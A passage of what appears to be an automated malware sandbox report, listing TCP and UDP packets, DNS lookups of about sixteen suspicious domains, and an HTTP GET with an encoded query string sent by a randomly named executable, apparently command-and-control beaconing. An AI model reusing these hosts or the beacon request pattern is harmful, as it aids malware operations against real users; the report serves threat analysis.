                                                                                                                                  Nov 7, 2024 12:55:20.678822041 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:20.683723927 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250017881 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250709057 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250768900 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:21.255795002 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:21.260592937 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.303980112 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.308917999 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.309010029 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.407049894 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.412039995 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.946882963 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.946955919 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:27.909712076 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:27.914691925 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:28.928385019 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.933257103 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:28.933345079 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.946497917 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.951241016 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:29.569917917 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:29.570106983 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:30.456268072 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:30.630666018 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.477653980 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.483602047 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.483752012 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.497761011 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.502751112 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502808094 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502819061 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502827883 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502878904 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502890110 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502898932 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.503112078 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.503890038 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:32.110892057 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:32.110982895 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:33.003074884 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:33.008758068 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.022331953 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.027103901 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.027196884 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.034862041 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.039817095 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.665364981 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.665970087 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.666153908 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.671721935 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.676577091 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:39.699104071 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:39.704098940 CET8050048188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:39.704205990 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:39.773663998 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:39.778548002 CET8050048188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:40.571367025 CET8050048188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:40.571569920 CET8050048188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:40.571759939 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:40.573219061 CET8050048188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:40.573406935 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:41.284343958 CET5004880192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:42.304718971 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:42.309720039 CET8050049188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:42.309842110 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:42.384443998 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:42.389415979 CET8050049188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:43.176357031 CET8050049188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:43.176386118 CET8050049188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:43.176444054 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:43.177959919 CET8050049188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:43.178009987 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:43.893771887 CET5004980192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:44.915746927 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:44.920614958 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.923973083 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:44.935820103 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:44.940702915 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940756083 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940769911 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940781116 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940825939 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940896034 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940901041 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940906048 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:44.940958977 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:45.798366070 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:45.798382044 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:45.798428059 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:45.801469088 CET8050050188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:45.801526070 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:46.443994045 CET5005080192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:47.459865093 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:47.464905977 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:47.464982033 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:47.473350048 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:47.478180885 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:48.344841003 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:48.344862938 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:48.344907045 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:48.345102072 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:48.346860886 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:48.349880934 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:48.350687027 CET5005180192.168.2.4188.114.97.3
                                                                                                                                  Nov 7, 2024 12:55:48.355775118 CET8050051188.114.97.3192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:53.464590073 CET5005280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:53.469404936 CET80500523.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:53.469474077 CET5005280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:53.481245041 CET5005280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:53.486257076 CET80500523.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:54.117868900 CET80500523.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:54.118033886 CET5005280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:54.989775896 CET5005280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:54.994558096 CET80500523.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:56.008977890 CET5005380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:56.014180899 CET80500533.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:56.014245033 CET5005380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:56.035095930 CET5005380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:56.039916992 CET80500533.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:56.665328979 CET80500533.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:56.665405989 CET5005380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:57.550256014 CET5005380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:57.556266069 CET80500533.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.573755980 CET5005480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:58.578630924 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.582005024 CET5005480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:58.593780994 CET5005480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:58.598668098 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598680973 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598714113 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598723888 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598751068 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598809004 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598927975 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598937988 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:58.598948002 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:59.208427906 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:59.208524942 CET5005480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:00.097332001 CET5005480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:00.102149963 CET80500543.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:01.115643024 CET5005580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:01.121831894 CET80500553.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:01.125983953 CET5005580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:01.133799076 CET5005580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:01.139636040 CET80500553.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:01.746458054 CET80500553.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:01.747025967 CET80500553.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:01.747067928 CET5005580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:01.773992062 CET5005580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:56:01.778851032 CET80500553.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:06.840694904 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:06.846007109 CET8050056104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:06.846076965 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:06.857296944 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:06.862279892 CET8050056104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:08.000544071 CET8050056104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:08.000736952 CET8050056104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:08.000777960 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:08.003140926 CET8050056104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:08.003185034 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:08.800111055 CET5005680192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:09.821772099 CET5005780192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:09.826596975 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:09.829979897 CET5005780192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:09.843523026 CET5005780192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:09.848676920 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:10.947571039 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:10.947669029 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:10.947700024 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:10.947735071 CET5005780192.168.2.4104.21.64.124
                                                                                                                                  Nov 7, 2024 12:56:10.949537992 CET8050057104.21.64.124192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:10.949712038 CET5005780192.168.2.4104.21.64.124

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 7, 2024 12:52:53.205487013 CET5348153192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:52:53.227936029 CET53534811.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:52:58.244779110 CET4981753192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:52:58.474427938 CET53498171.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:14.615716934 CET5215853192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:53:14.645407915 CET53521581.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:28.240724087 CET5640153192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:53:28.352792025 CET53564011.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:41.959681034 CET5234753192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:53:42.314963102 CET53523471.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:55.585277081 CET6315253192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:53:55.610285044 CET53631521.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:09.476882935 CET5671753192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:54:09.888525963 CET53567171.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:23.803571939 CET6406653192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:54:23.817298889 CET53640661.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:37.303886890 CET5374753192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:54:37.350317955 CET53537471.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:50.850487947 CET6243253192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:54:50.913449049 CET53624321.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:58.975452900 CET6025053192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:54:59.425940037 CET53602501.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:12.860261917 CET5100653192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:55:12.895402908 CET53510061.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.274048090 CET5761053192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:55:26.298333883 CET53576101.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:39.680202007 CET5681653192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:55:39.693221092 CET53568161.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:53.366290092 CET5648853192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:55:53.462086916 CET53564881.1.1.1192.168.2.4
                                                                                                                                  Nov 7, 2024 12:56:06.793265104 CET5919953192.168.2.41.1.1.1
                                                                                                                                  Nov 7, 2024 12:56:06.838228941 CET53591991.1.1.1192.168.2.4

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Nov 7, 2024 12:52:53.205487013 CET192.168.2.41.1.1.10x38e2Standard query (0)www.tangible.onlineA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:52:58.244779110 CET192.168.2.41.1.1.10x758bStandard query (0)www.tesetturhanzade.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:14.615716934 CET192.168.2.41.1.1.10x9dc9Standard query (0)www.kantinestoel.onlineA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:28.240724087 CET192.168.2.41.1.1.10x3b42Standard query (0)www.deeplungatlas.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:41.959681034 CET192.168.2.41.1.1.10x2c69Standard query (0)www.ultrawin23.shopA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:55.585277081 CET192.168.2.41.1.1.10xb3d8Standard query (0)www.sonoscan.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:09.476882935 CET192.168.2.41.1.1.10xf149Standard query (0)www.zz67x.topA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:23.803571939 CET192.168.2.41.1.1.10xcf6Standard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:37.303886890 CET192.168.2.41.1.1.10x9e2dStandard query (0)www.vibixx.siteA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:50.850487947 CET192.168.2.41.1.1.10x561fStandard query (0)www.rka6460.onlineA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:58.975452900 CET192.168.2.41.1.1.10xb327Standard query (0)www.papampalli.shopA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:12.860261917 CET192.168.2.41.1.1.10x1a6Standard query (0)www.vincemachi.netA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:26.274048090 CET192.168.2.41.1.1.10x1bb2Standard query (0)www.smileyface.worldA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:39.680202007 CET192.168.2.41.1.1.10x8ddbStandard query (0)www.dodsrprolev.shopA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:53.366290092 CET192.168.2.41.1.1.10x6f66Standard query (0)www.optimallogics.servicesA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:56:06.793265104 CET192.168.2.41.1.1.10xbf68Standard query (0)www.gokulmohan.onlineA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Nov 7, 2024 12:52:53.227936029 CET1.1.1.1192.168.2.40x38e2Name error (3)www.tangible.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:52:58.474427938 CET1.1.1.1192.168.2.40x758bNo error (0)www.tesetturhanzade.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:52:58.474427938 CET1.1.1.1192.168.2.40x758bNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:52:58.474427938 CET1.1.1.1192.168.2.40x758bNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:14.645407915 CET1.1.1.1192.168.2.40x9dc9No error (0)www.kantinestoel.onlinekantinestoel.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:14.645407915 CET1.1.1.1192.168.2.40x9dc9No error (0)kantinestoel.online91.184.0.200A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:28.352792025 CET1.1.1.1192.168.2.40x3b42No error (0)www.deeplungatlas.org194.9.94.85A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:28.352792025 CET1.1.1.1192.168.2.40x3b42No error (0)www.deeplungatlas.org194.9.94.86A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:42.314963102 CET1.1.1.1192.168.2.40x2c69No error (0)www.ultrawin23.shopultrawin23.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:42.314963102 CET1.1.1.1192.168.2.40x2c69No error (0)ultrawin23.shop170.39.213.43A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:55.610285044 CET1.1.1.1192.168.2.40xb3d8No error (0)www.sonoscan.org13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:53:55.610285044 CET1.1.1.1192.168.2.40xb3d8No error (0)www.sonoscan.org76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:09.888525963 CET1.1.1.1192.168.2.40xf149No error (0)www.zz67x.topzz67x.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:09.888525963 CET1.1.1.1192.168.2.40xf149No error (0)zz67x.top38.47.232.194A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:23.817298889 CET1.1.1.1192.168.2.40xcf6No error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:37.350317955 CET1.1.1.1192.168.2.40x9e2dNo error (0)www.vibixx.site162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:50.913449049 CET1.1.1.1192.168.2.40x561fNo error (0)www.rka6460.onlinerka6460.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:59.425940037 CET1.1.1.1192.168.2.40xb327No error (0)www.papampalli.shoppapampalli.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:54:59.425940037 CET1.1.1.1192.168.2.40xb327No error (0)papampalli.shop162.241.85.94A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:12.895402908 CET1.1.1.1192.168.2.40x1a6No error (0)www.vincemachi.netvincemachi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:12.895402908 CET1.1.1.1192.168.2.40x1a6No error (0)vincemachi.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:12.895402908 CET1.1.1.1192.168.2.40x1a6No error (0)vincemachi.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:26.298333883 CET1.1.1.1192.168.2.40x1bb2No error (0)www.smileyface.worldsmileyface.worldCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:26.298333883 CET1.1.1.1192.168.2.40x1bb2No error (0)smileyface.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:26.298333883 CET1.1.1.1192.168.2.40x1bb2No error (0)smileyface.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:39.693221092 CET1.1.1.1192.168.2.40x8ddbNo error (0)www.dodsrprolev.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:39.693221092 CET1.1.1.1192.168.2.40x8ddbNo error (0)www.dodsrprolev.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:53.462086916 CET1.1.1.1192.168.2.40x6f66No error (0)www.optimallogics.servicesoptimallogics.servicesCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:53.462086916 CET1.1.1.1192.168.2.40x6f66No error (0)optimallogics.services3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:55:53.462086916 CET1.1.1.1192.168.2.40x6f66No error (0)optimallogics.services15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:56:06.838228941 CET1.1.1.1192.168.2.40xbf68No error (0)www.gokulmohan.online104.21.64.124A (IP address)IN (0x0001)false
                                                                                                                                  Nov 7, 2024 12:56:06.838228941 CET1.1.1.1192.168.2.40xbf68No error (0)www.gokulmohan.online172.67.185.22A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.tesetturhanzade.xyz
                                                                                                                                  • www.kantinestoel.online
                                                                                                                                  • www.deeplungatlas.org
                                                                                                                                  • www.ultrawin23.shop
                                                                                                                                  • www.sonoscan.org
                                                                                                                                  • www.zz67x.top
                                                                                                                                  • www.omnibizlux.biz
                                                                                                                                  • www.vibixx.site
                                                                                                                                  • www.papampalli.shop
                                                                                                                                  • www.vincemachi.net
                                                                                                                                  • www.smileyface.world
                                                                                                                                  • www.dodsrprolev.shop
                                                                                                                                  • www.optimallogics.services
                                                                                                                                  • www.gokulmohan.online

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.44974285.159.66.93804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:52:58.571275949 CET341OUTGET /ur0f/?NBfdCRyH=zogJdywBU1O1LleSauKJSsuFV/4Ok9lE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiLOby4W89Tfql961FjyGPsIlp+mbksH+4eXA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
